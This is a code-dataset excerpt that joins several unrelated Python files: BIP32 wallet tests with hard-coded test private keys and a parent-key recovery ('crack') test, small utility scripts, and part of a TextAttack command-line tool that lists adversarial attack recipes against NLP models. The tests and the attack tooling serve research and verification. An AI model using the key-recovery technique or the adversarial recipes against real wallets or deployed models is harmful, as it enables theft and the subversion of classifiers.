= b'xprv9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'\n\n # m/0'/0'/5'\n receive = b'VUqyLGVdUADWEqDqL2DeUBAcbPQwZfWDDY'\n indexes = [0x80000000, 0x80000000, 0x80000005]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, receive)\n path = \"m/0'/0'/5'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, path)), addr_version)\n self.assertEqual(addr, receive)\n\n # m/0'/1'/1'\n change = b'VMg6DpX7SQUsoECdpXJ8Bv6R7p11PfwHwy'\n indexes = [0x80000000, 0x80000001, 0x80000001]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, change)\n path = \"m/0'/1'/1'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, path)), addr_version)\n self.assertEqual(addr, change)\n\n xkey_version = bip32.PRV_VERSION[0]\n seed = 
\"5b56c417303faa3fcba7e57400e120a0ca83ec5a4fc9ffba757fbe63fbd77a89a1a3be4c67196f57c39a88b76373733891bfaba16ed27a813ceed498804c0570\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(rootxprv, b'xprv9s21ZrQH143K3t4UZrNgeA3w861fwjYLaGwmPtQyPMmzshV2owVpfBSd2Q7YsHZ9j6i6ddYjb5PLtUdMZn8LhvuCVhGcQntq5rn7JVMqnie')\n\n indexes = [0x80000000, 0, 0] # receive\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, b'VTpEhLjvGYE16pLcNrMY53gQB9bbhn581W')\n\n indexes = [0x80000000, 1, 0] # change\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, b'VRtaZvAe4s29aB3vuXyq7GYEpahsQet2B1')\n\n def test_exceptions(self):\n xprv = b'xppp9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'\n\n self.assertRaises(ValueError, bip32.ckd, xprv, 'invalid index')\n self.assertRaises(ValueError, bip32.ckd, xprv, 0x80000000)\n self.assertRaises(ValueError, bip32.ckd, xprv, \"800000\")\n self.assertRaises(ValueError, bip32.derive, xprv, '/1')\n self.assertRaises(TypeError, bip32.derive, xprv, 1)\n xprv = b'xprv9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'\n self.assertRaises(ValueError, bip32.child_index, xprv)\n\n version = b'\\x04\\x88\\xAD\\xE5' # invalid version\n xkey = version + b'\\x00'*74\n xkey = base58.encode_check(xkey)\n self.assertRaises(ValueError, bip32.ckd, xkey, 0x80000000)\n\n # invalid private version\n version = b'\\x04\\x88\\xAD\\xE5'\n seed = \"5b56c417303faa3fcba7e57400e120a0ca83ec5a4fc9ffba757fbe63fbd77a89a1a3be4c67196f57c39a88b76373733891bfaba16ed27a813ceed498804c0570\"\n self.assertRaises(ValueError, bip32.rootxprv_from_seed, seed, version)\n #bip32.rootxprv_from_seed(seed, version)\n\n # extended key is not a private one\n xpub = b'xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy'\n self.assertRaises(ValueError, bip32.xpub_from_xprv, xpub)\n #bip32.xpub_from_xprv(xpub)\n\n # Absolute derivation path for non-master key\n self.assertRaises(ValueError, bip32.derive, xpub, \"m/44'/0'/1'/0/10\")\n #bip32.derive(xpub, \"m/0/1\")\n\n # extended key is not a public one\n self.assertRaises(ValueError, bip32.p2pkh_address_from_xpub, xprv)\n #bip32.p2pkh_address_from_xpub(xprv)\n\n def test_crack(self):\n parent_xpub = b'xpub6BabMgRo8rKHfpAb8waRM5vj2AneD4kDMsJhm7jpBDHSJvrFAjHJHU5hM43YgsuJVUVHWacAcTsgnyRptfMdMP8b28LYfqGocGdKCFjhQMV'\n child_xprv = b'xprv9xkG88dGyiurKbVbPH1kjdYrA8poBBBXa53RKuRGJXyruuoJUDd8e4m6poiz7rV8Z4NoM5AJNcPHN6aj8wRFt5CWvF8VPfQCrDUcLU5tcTm'\n parent_xprv = bip32.crack(parent_xpub, child_xprv)\n self.assertEqual(bip32.xpub_from_xprv(parent_xprv), parent_xpub)\n index = bip32.child_index(child_xprv)\n self.assertEqual(bip32.ckd(parent_xprv, index), child_xprv)\n path = [index]\n self.assertEqual(bip32.derive(parent_xprv, path), child_xprv)\n\n # extended parent key is not a public one\n self.assertRaises(ValueError, bip32.crack, parent_xprv, child_xprv)\n #bip32.crack(parent_xprv, child_xprv)\n\n # extended child key is not a private one\n self.assertRaises(ValueError, bip32.crack, parent_xpub, parent_xpub)\n #bip32.crack(parent_xpub, parent_xpub)\n\n # wrong child/parent depth relation\n child_xpub = bip32.xpub_from_xprv(child_xprv)\n self.assertRaises(ValueError, bip32.crack, child_xpub, child_xprv)\n 
#bip32.crack(child_xpub, child_xprv)\n\n # not a child for the provided parent\n child0_xprv = bip32.ckd(parent_xprv, 0)\n grandchild_xprv = bip32.ckd(child0_xprv, 0)\n self.assertRaises(ValueError, bip32.crack, child_xpub, grandchild_xprv)\n #bip32.crack(child_xpub, grandchild_xprv)\n\n # hardened derivation\n hardened_child_xprv = bip32.ckd(parent_xprv, 0x80000000)\n self.assertRaises(ValueError, bip32.crack, parent_xpub, hardened_child_xprv)\n #bip32.crack(parent_xpub, hardened_child_xprv)\n\n def test_versions(self):\n\n # data cross-checked with Electrum and https://jlopp.github.io/xpub-converter/\n\n # 128 bits\n raw_entr = bytes.fromhex('6'*32)\n # 12 words\n mnemonic = bip39.mnemonic_from_entropy(raw_entr, 'en')\n seed = bip39.seed_from_mnemonic(mnemonic, '')\n\n ##### TESTNET\n\n # p2pkh BIP44 m / 44' / coin_type' / account' / change / address_index\n path = \"m/44h/1h/0h\"\n version = bip32.TEST_tprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'tpubDChqWo2Xi2wNsxyJBE8ipcTJHLKWcqeeNUKBVTpUCNPZkHzHTm3qKAeHqgCou1t8PAY5ZnJ9QDa6zXSZxmjDnhiBpgZ7f6Yv88wEm5HXVbm'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'moutHSzeFWViMNEcvBxKzNCMj2kca8MvE1'\n self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'myWcXdNais9ExumnGKnNoJwoihQKfNPG9i'\n self.assertEqual(address, exp_address)\n\n # legacy segwit (p2wpkh-p2sh) m / 49'/ coin_type' / account' / change / address_index\n path = \"m/49h/1h/0h\"\n version = bip32.TEST_uprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'upub5Dj8j7YrwodV68mt58QmNpSzjqjso2WMXEpLGLSvskKccGuXhCh3dTedkzVLAePA617UyXAg2vdswJXTYjU4qjMJaHU79GJVVJCAiy9ezZ2'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # TODO: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'2Mw8tQ6uT6mHhybarVhjgomUhHQJTeV9A2c'\n # TODO: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # TODO: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'2N872CRJ3E1CzWjfixXr3aeC3hkF5Cz4kWb'\n # TODO: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.TEST_Uprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Upub5QdDrMHJWmBrWhwG1nskCtnoTdn91PBwqWU1BbiUFXA2ETUSTc5KiaWZZhSoj5c4KUBTr7Anv92P4U9Dqxd1zDTyQkaWYfmVP2U3Js1W5cG'\n self.assertEqual(xpub, exp)\n\n # native segwit (p2wpkh) m / 84'/ coin_type' / account' / change / address_index\n path = \"m/84h/1h/0h\"\n version = bip32.TEST_vprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'vpub5ZhJmduYY7M5J2qCJgSW7hunX6zJrr5WuNg2kKt321HseZEYxqJc6Zso47aNXQw3Wf3sA8kppbfsxnLheUNXcL3xhzeBHLNp8fTVBN6DnJF'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'bcrt1qv8lcnmj09rpdqwgl025h2deygur64z4hqf7me5'\n # FIXME: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # 
FIXME: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'bcrt1qqhxvky4y6qkwpvdzqjkdafmj20vs5trmt6y8w5'\n # FIXME: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.TEST_Vprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Vpub5kbPtsdz74uSibzaFLuUwnFbEu2a5Cm7DeKhfb9aPn8HGjoTjEgtBgjirpXr5r9wk87r2ikwhp4P5wxTwhXUkpAdYTkagjqp2PjMmGPBESU'\n self.assertEqual(xpub, exp)\n\n ##### MAINNET\n\n # p2pkh BIP44 m / 44' / coin_type' / account' / change / address_index\n path = \"m/44h/0h/0h\"\n version = bip32.MAIN_xprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'xpub6C3uWu5Go5q62JzJpbjyCLYRGLYvexFeiepZTsYZ6SRexARkNfjG7GKtQVuGR3KHsyKsAwv7Hz3iNucPp6pfHiLvBczyK1j5CtBtpHB3NKx'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'1DDKKVHoFWGfctyEEJvrusqq6ipEaieGCq'\n self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'1FhKoffreKHzhtBMVW9NSsg3ZF148JPGoR'\n self.assertEqual(address, exp_address)\n\n # legacy segwit (p2wpkh-p2sh) m / 49'/ coin_type' / account' / change / address_index\n path = \"m/49h/0h/0h\"\n version = bip32.MAIN_yprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'ypub6YBGdYufCVeoPVmNXfdrWhaBCXsQoLKNetNmD9bPTrKmnKVmiyU8f1uJqwGdmBb8kbAZpHoYfXQTLbWpkXc4skQDAreeCUXdbX9k8vtiHsN'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'3FmNAiTCWe5kPMgc4dtSgEdY8VuaCiJEH8'\n # FIXME: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'34FLgkoRYX5Q5fqiZCZDwsK5GpXxmFuLJN'\n # FIXME: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.MAIN_Yprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Ypub6j5Mkne6mTDAp4vkUL6qLmuyvKug1gzxyA2S8QrvqdABQW4gVNrQk8mEeeE7Kcp2z4EYgsofYjnxTm8b3km22EWt1Km3bszdVFRcipc6rXu'\n self.assertEqual(xpub, exp)\n\n # native segwit (p2wpkh) m / 84'/ coin_type' / account' / change / address_index\n path = \"m/84h/0h/0h\"\n version = bip32.MAIN_zprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'zpub6qg3Uc1BAQkQvcBUYMmZHSzbsshSon3FvJ8yvH3ZZMjFNvJkwSji8UUwghiF3wvpvSvcNWVP8kfUhc2V2RwGp6pTC3ouj6njj956f26TniN'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'bc1q0hy024867ednvuhy9en4dggflt5w9unw4ztl5a'\n # FIXME: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'bc1qy4x03jyl88h2zeg7l287xhv2xrwk4c3ztfpjd2'\n # FIXME: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.MAIN_Zprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n 
xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Zpub72a8bqjcjNJnMBLrV2EY7XLQbfji28irEZneqYK6w8Zf16sfhr7zDbLsVQficP9j9uzbF6VW1y3ypmeFKf6Dxaw82WvK8WFjcsLyEvMNZjF'\n self.assertEqual(xpub, exp)\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n unittest.main()\n","sub_path":"tests/test_bip32.py","file_name":"test_bip32.py","file_ext":"py","file_size_in_byte":33952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
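test_crack in the record above exercises one more property worth calling out: bip32.crack recovers a parent extended private key from the parent xpub plus any non-hardened child xprv. A standalone sketch using the same key pair the test hard-codes:

from btclib import bip32

parent_xpub = b'xpub6BabMgRo8rKHfpAb8waRM5vj2AneD4kDMsJhm7jpBDHSJvrFAjHJHU5hM43YgsuJVUVHWacAcTsgnyRptfMdMP8b28LYfqGocGdKCFjhQMV'
child_xprv = b'xprv9xkG88dGyiurKbVbPH1kjdYrA8poBBBXa53RKuRGJXyruuoJUDd8e4m6poiz7rV8Z4NoM5AJNcPHN6aj8wRFt5CWvF8VPfQCrDUcLU5tcTm'

# Recover the parent xprv and confirm it neuters back to the known xpub.
parent_xprv = bip32.crack(parent_xpub, child_xprv)
assert bip32.xpub_from_xprv(parent_xprv) == parent_xpub

This is why leaking a single non-hardened child xprv together with the parent xpub compromises the whole branch; as the test also asserts, hardened derivation blocks the recovery.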
{"seq_id":"412926027","text":"import datetime\nfrom pytz import timezone\nfrom dateutil.relativedelta import relativedelta\n\n\ndef get_kst():\n \"\"\"\n Use this when you always want the current Korean time, in any environment.\n\n **Example**\n\n ```\n import simple_utils\n print(simple_utils.time.get_kst())\n ```\n\n **Returns**\n\n * **Korean time** (*datetime.datetime*) --\n \"\"\"\n return datetime.datetime.now(timezone('Asia/Seoul'))\n\ndef get_kst_ymd():\n \"\"\"\n Use this when you always want the current Korean date as %Y-%m-%d, in any environment.\n\n **Example**\n\n ```\n import simple_utils\n print(simple_utils.time.get_kst_ymd())\n ```\n\n **Returns**\n\n * **Korean time as %Y-%m-%d** (*str*) --\n \"\"\" \n return get_kst().strftime('%Y-%m-%d')\n \ndef get_month_dt_list(start_dt, last_dt=None, format=None):\n \"\"\"\n Returns the dates between two dates, one per month.\n\n **Example**\n\n ```\n import simple_utils\n from datetime import datetime\n print(simple_utils.time.get_month_dt_list(datetime(2015, 1, 1)))\n ```\n\n **Parameters**\n\n * **[REQUIRED] start_dt** (*datetime.datetime*) --\n \n The date to start from.\n \n * **last_dt** (*datetime.datetime*) --\n \n *Default: None*\n\n The date to end at.\n\n * **format** (*str*) --\n \n *Default: None*\n\n Pass a strftime format string here to get the results back as strings.\n\n **Returns**\n\n * **datetime list** (*list*) --\n \"\"\" \n dt = datetime.datetime(start_dt.year, start_dt.month, 1)\n if not last_dt:\n now = datetime.datetime.now()\n last_dt = datetime.datetime(now.year, now.month, 1)\n else:\n last_dt = datetime.datetime(last_dt.year, last_dt.month, 1)\n \n\n dt_list = []\n while dt <= last_dt:\n dt_list.append(dt)\n dt += relativedelta(months=1)\n\n if format:\n return [dt.strftime(format) for dt in dt_list]\n \n return dt_list\n\ndef get_seconds_by_unit(str_time):\n \"\"\"\n Converts a simple time string such as 24h, 30m, or 10s into an int number of seconds.\n\n **Example**\n\n ```\n import simple_utils\n print(simple_utils.time.get_seconds_by_unit('24h'))\n ```\n\n **Parameters**\n\n * **[REQUIRED] str_time** (*str*) --\n\n A time string. It can be given in the following forms:\n \n - 24h: 24 hours\n - 30m: 30 minutes\n - 10s: 10 seconds\n \n **Returns**\n\n * **seconds** (*int*) -- \n \"\"\"\n unit = str_time[-1]\n num = int(str_time[:-1])\n seconds = -1\n if unit == 'h':\n seconds = num * 60 * 60\n elif unit == 'm':\n seconds = num * 60\n elif unit == 's':\n seconds = num\n else:\n raise ValueError(f'invalid unit {unit}')\n \n return seconds\n","sub_path":"simple_utils/simple_time.py","file_name":"simple_time.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399030810","text":"#!/usr/bin/env python\n\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\n\ndisplay = Display(visible=0, size=(1024, 768))\ndisplay.start()\n\nbrowser = webdriver.Firefox()\nbrowser.get('http://www.ubuntu.com/')\nprint (browser.page_source)\n\nbrowser.close()\ndisplay.stop()","sub_path":"pocs/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371720246","text":"class Solution:\n\n ## SOLUTION 1:\n def threeNumberSort1(self, array, order):\n ## Time O(3n) [order is constant with len. of 3] || Space O(1)\n if not order:\n return array\n\n leftPtr = 0\n for orderedNum in order:\n rightPtr = leftPtr + 1\n while rightPtr < len(array):\n if array[leftPtr] == orderedNum:\n leftPtr += 1\n rightPtr += 1\n elif array[leftPtr] != orderedNum and array[rightPtr] == orderedNum:\n array[leftPtr], array[rightPtr] = array[rightPtr], array[leftPtr]\n leftPtr += 1\n rightPtr += 1\n else:\n rightPtr += 1\n return array\n\n ## SOLUTION 2:\n def threeNumberSort2(self, array, order):\n # Time O(n) || Space O(1)\n if len(order) < 3 or not order:\n return array\n\n firstValue = order[0]\n thirdValue = order[2]\n\n firstIdx = 0\n for idx in range(len(array)):\n if array[idx] == firstValue:\n array[idx], array[firstIdx] = array[firstIdx], array[idx]\n firstIdx += 1\n\n thirdIdx = len(array) - 1\n for idx in reversed(range(len(array))):\n if array[idx] == thirdValue:\n array[idx], array[thirdIdx] = array[thirdIdx], array[idx]\n thirdIdx -= 1\n\n return array\n\n\nif __name__ == \"__main__\":\n\n print(Solution().threeNumberSort1([1, 0, 0, -1, -1, 0, 1, 1], [0, 1, -1]))\n print(Solution().threeNumberSort2([1, 0, 0, -1, -1, 0, 1, 1], [-1, 0, 1]))\n","sub_path":"Medium/threeNumberSortBasedOnOrder.py","file_name":"threeNumberSortBasedOnOrder.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"475136646","text":"\nimport argparse\n\n_meta_shell_command = 'k12'\n\n\ndef lineToASCII(line):\n \n #print(line[0:2])\n if line[0:2] == '|0':\n line = line[2:].strip(' |\\r\\n')\n else:\n return None\n \n lhex = line.split('|')\n \n lascii = []\n nhex = -1\n for hx in lhex:\n nhex += 1\n \n # Cut all bytes before the 42th (UDP).\n #if nhex < 42:\n # continue\n \n i = int(hx, 16)\n \n if i < 32 or i > 126:\n i = ord('_')\n \n lascii.append( chr(i) )\n \n #print(lascii)\n \n return \"\".join(lascii)\n \n\nif __name__ == '__main__':\n \n print('begin')\n \n parser = argparse.ArgumentParser()\n parser.add_argument('filein', nargs='+')\n args = parser.parse_args()\n \n file_in = args.filein[0]\n \n fh = open(file_in, 'r')\n lines = fh.readlines()\n fh.close()\n \n allPayloads = []\n i = 0\n for line in lines:\n \n try:\n lineo = lineToASCII(line)\n \n if lineo is not None:\n 
allPayloads.append(lineo)\n except Exception as e:\n print('Failed line %s: %s. E: %s.' % (i, line, e))\n \n i += 1\n \n fh = open(file_in + '.k12bytes.txt', 'w')\n fh.write(\"\\n\".join(allPayloads))\n fh.close()\n \n print('end')\n ","sub_path":"shell_ext/meh/k12_to_udp.py","file_name":"k12_to_udp.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"394132424","text":"from sklearn.feature_extraction.text import HashingVectorizer\nimport numpy as np\nimport re\nimport os\nimport pickle\n\nclass SentimentClasify:\n\n\t@staticmethod\n\tdef getSentiment(sentence):\n\t\tcurrent_directory = os.path.dirname(__file__)\n\t\tskipped_words = pickle.load(open(os.path.join(current_directory, 'Classifiers', 'stopwordsClassifier.pkl'), 'rb'))\n\t\tclassifier = pickle.load(open(os.path.join(current_directory, 'Classifiers', 'classifier.pkl'), 'rb'))\n\n\t\tdef tokenizeText(opinions):\n\t\t\topinions = re.sub('<[^>]*>', '', opinions)\n\t\t\topinions = re.sub('[\\W]+', ' ', opinions.lower())\n\t\t\ttokenizedText = [w for w in opinions.split() if w not in skipped_words]\n\t\t\treturn tokenizedText\n\n\t\tvector = HashingVectorizer(decode_error='strict', n_features=2**21, preprocessor=None, tokenizer=tokenizeText, norm='l2', binary=True, alternate_sign=True, ngram_range=(1, 2))\n\t\tlabel = {0:'Negatywna', 1:'Pozytywna'}\n\t\tX = vector.transform(sentence)\n\t\tif label[classifier.predict(X)[0]] == 'Pozytywna':\n\t\t\tpositive = True\n\t\telse: \n\t\t\tpositive = False\n\t\tsentiment = {\"Positive\": positive, \"Probability\": np.max(classifier.predict_proba(X))*100}\n\t\treturn sentiment","sub_path":"sentimentClasify.py","file_name":"sentimentClasify.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"301724898","text":"import argparse\nimport numpy as np\nimport os\nimport random\nimport sys\nimport textattack\nimport time\nimport torch\nimport pickle\nimport copy\n\nRECIPE_NAMES = {\n 'alzantot': 'textattack.attack_recipes.Alzantot2018',\n 'alz-adjusted': 'textattack.attack_recipes.Alzantot2018Adjusted',\n 'deepwordbug': 'textattack.attack_recipes.DeepWordBugGao2018',\n 'hotflip': 'textattack.attack_recipes.HotFlipEbrahimi2017',\n 'kuleshov': 'textattack.attack_recipes.Kuleshov2017',\n 'seq2sick': 'textattack.attack_recipes.Seq2SickCheng2018BlackBox',\n 'textfooler': 'textattack.attack_recipes.TextFoolerJin2019',\n 'tf-adjusted': 'textattack.attack_recipes.TextFoolerJin2019Adjusted',\n}\n\nMODEL_CLASS_NAMES = {\n #\n # Text classification models\n #\n \n # BERT models - default uncased\n 'bert-ag-news': 'textattack.models.classification.bert.BERTForAGNewsClassification',\n 'bert-imdb': 'textattack.models.classification.bert.BERTForIMDBSentimentClassification',\n 'bert-mr': 'textattack.models.classification.bert.BERTForMRSentimentClassification',\n 'bert-yelp-sentiment': 'textattack.models.classification.bert.BERTForYelpSentimentClassification',\n # CNN models\n 'cnn-ag-news': 'textattack.models.classification.cnn.WordCNNForAGNewsClassification',\n 'cnn-imdb': 'textattack.models.classification.cnn.WordCNNForIMDBSentimentClassification',\n 'cnn-mr': 'textattack.models.classification.cnn.WordCNNForMRSentimentClassification',\n 'cnn-yelp-sentiment': 'textattack.models.classification.cnn.WordCNNForYelpSentimentClassification',\n # LSTM models\n 'lstm-ag-news': 
'textattack.models.classification.lstm.LSTMForAGNewsClassification',\n 'lstm-imdb': 'textattack.models.classification.lstm.LSTMForIMDBSentimentClassification',\n 'lstm-mr': 'textattack.models.classification.lstm.LSTMForMRSentimentClassification',\n 'lstm-yelp-sentiment': 'textattack.models.classification.lstm.LSTMForYelpSentimentClassification',\n #\n # Textual entailment models\n #\n # BERT models\n 'bert-mnli': 'textattack.models.entailment.bert.BERTForMNLI',\n 'bert-snli': 'textattack.models.entailment.bert.BERTForSNLI',\n #\n # Translation models\n #\n 't5-en2fr': 'textattack.models.translation.t5.T5EnglishToFrench',\n 't5-en2de': 'textattack.models.translation.t5.T5EnglishToGerman',\n 't5-en2ro': 'textattack.models.translation.t5.T5EnglishToRomanian',\n #\n # Summarization models\n #\n 't5-summ': 'textattack.models.summarization.T5Summarization',\n}\n\nDATASET_BY_MODEL = {\n #\n # Text classification datasets\n #\n # AG News\n 'bert-ag-news': textattack.datasets.classification.AGNews,\n 'cnn-ag-news': textattack.datasets.classification.AGNews,\n 'lstm-ag-news': textattack.datasets.classification.AGNews,\n # IMDB \n 'bert-imdb': textattack.datasets.classification.IMDBSentiment,\n 'cnn-imdb': textattack.datasets.classification.IMDBSentiment,\n 'lstm-imdb': textattack.datasets.classification.IMDBSentiment,\n # MR\n 'bert-mr': textattack.datasets.classification.MovieReviewSentiment,\n 'cnn-mr': textattack.datasets.classification.MovieReviewSentiment,\n 'lstm-mr': textattack.datasets.classification.MovieReviewSentiment,\n # Yelp\n 'bert-yelp-sentiment': textattack.datasets.classification.YelpSentiment,\n 'cnn-yelp-sentiment': textattack.datasets.classification.YelpSentiment,\n 'lstm-yelp-sentiment': textattack.datasets.classification.YelpSentiment,\n #\n # Textual entailment datasets\n #\n 'bert-mnli': textattack.datasets.entailment.MNLI,\n 'bert-snli': textattack.datasets.entailment.SNLI,\n #\n # Translation datasets\n #\n 't5-en2de': textattack.datasets.translation.NewsTest2013EnglishToGerman,\n}\n\nTRANSFORMATION_CLASS_NAMES = {\n 'word-swap-embedding': 'textattack.transformations.WordSwapEmbedding',\n 'word-swap-homoglyph': 'textattack.transformations.WordSwapHomoglyph',\n 'word-swap-neighboring-char-swap': 'textattack.transformations.WordSwapNeighboringCharacterSwap',\n 'word-swap-random-char-deletion': 'textattack.transformations.WordSwapRandomCharacterDeletion',\n 'word-swap-random-char-insertion': 'textattack.transformations.WordSwapRandomCharacterInsertion',\n 'word-swap-random-char-substitution': 'textattack.transformations.WordSwapRandomCharacterSubstitution',\n 'word-swap-wordnet': 'textattack.transformations.WordSwapWordNet',\n}\n\nCONSTRAINT_CLASS_NAMES = {\n #\n # Semantics constraints\n #\n 'embedding': 'textattack.constraints.semantics.WordEmbeddingDistance',\n 'bert': 'textattack.constraints.semantics.sentence_encoders.BERT',\n 'infer-sent': 'textattack.constraints.semantics.sentence_encoders.InferSent',\n 'thought-vector': 'textattack.constraints.semantics.sentence_encoders.ThoughtVector',\n 'use': 'textattack.constraints.semantics.sentence_encoders.UniversalSentenceEncoder',\n #\n # Grammaticality constraints\n #\n 'lang-tool': 'textattack.constraints.grammaticality.LanguageTool', \n 'part-of-speech': 'textattack.constraints.grammaticality.PartOfSpeech', \n 'goog-lm': 'textattack.constraints.grammaticality.language_models.GoogleLanguageModel',\n 'gpt2': 'textattack.constraints.grammaticality.language_models.GPT2',\n #\n # Overlap constraints\n #\n 'bleu': 
'textattack.constraints.overlap.BLEU', \n 'chrf': 'textattack.constraints.overlap.chrF', \n 'edit-distance': 'textattack.constraints.overlap.LevenshteinEditDistance',\n 'meteor': 'textattack.constraints.overlap.METEOR',\n 'max-words-perturbed': 'textattack.constraints.overlap.MaxWordsPerturbed',\n #\n # Pre-transformation constraints\n #\n 'repeat': 'textattack.constraints.pre_transformation.RepeatModification',\n 'stopword': 'textattack.constraints.pre_transformation.StopwordModification',\n}\n\nSEARCH_CLASS_NAMES = {\n 'beam-search': 'textattack.search_methods.BeamSearch',\n 'greedy': 'textattack.search_methods.GreedySearch',\n 'ga-word': 'textattack.search_methods.GeneticAlgorithm',\n 'greedy-word-wir': 'textattack.search_methods.GreedyWordSwapWIR',\n}\n\nGOAL_FUNCTION_CLASS_NAMES = {\n 'non-overlapping-output': 'textattack.goal_functions.NonOverlappingOutput',\n 'targeted-classification': 'textattack.goal_functions.TargetedClassification',\n 'untargeted-classification': 'textattack.goal_functions.UntargetedClassification',\n}\n\ndef set_seed(random_seed):\n random.seed(random_seed)\n np.random.seed(random_seed)\n torch.manual_seed(random_seed)\n\ndef get_args():\n # Parser for regular arguments\n parser = argparse.ArgumentParser(\n description='A commandline parser for TextAttack', \n 